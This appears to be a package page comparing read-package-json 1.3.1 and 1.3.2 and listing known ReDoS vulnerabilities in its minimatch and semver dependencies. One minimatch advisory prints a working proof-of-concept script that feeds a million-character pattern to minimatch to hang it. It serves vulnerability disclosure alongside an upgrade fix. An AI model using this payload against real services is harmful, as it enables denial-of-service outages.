Read-package-json, a vital tool used by npm to interpret package.json files, saw a minor update from version 1.3.1 to 1.3.2. Both versions maintain the same core functionality, providing semantic understanding, applying defaults, and validating package.json content. Key dependencies like 'glob' for file pattern matching, 'lru-cache' for efficient caching, 'graceful-fs' for robust file system operations, 'github-url-from-git' and 'github-url-from-username-repo' for GitHub URL extraction, and 'normalize-package-data' for ensuring data consistency remain consistent.
The significant change lies in the development dependencies. Version 1.3.2 upgrades the "tap" testing framework to "^0.7.1" aiming to upgrade testing compatibility, while v1.3.1 relies on an older "~0.2.5" version. This suggests a focus on improved testing or compatibility in the newer release.
For developers using read-package-json, this update is crucial if existing test suites rely on the latest tap features. If not, the core functionality remains unchanged, offering dependable reading and validation capabilities for package.json files. Both versions provide the core benefits of streamlining package management with robust conventions through package metadata handling, and retrieving information from Git repository URLs. This update provides increased test tooling functionality for developers. V1.3.2 was released 17 days after 1.3.1
All the vulnerabilities related to the version 1.3.2 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
semver vulnerable to Regular Expression Denial of Service
Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.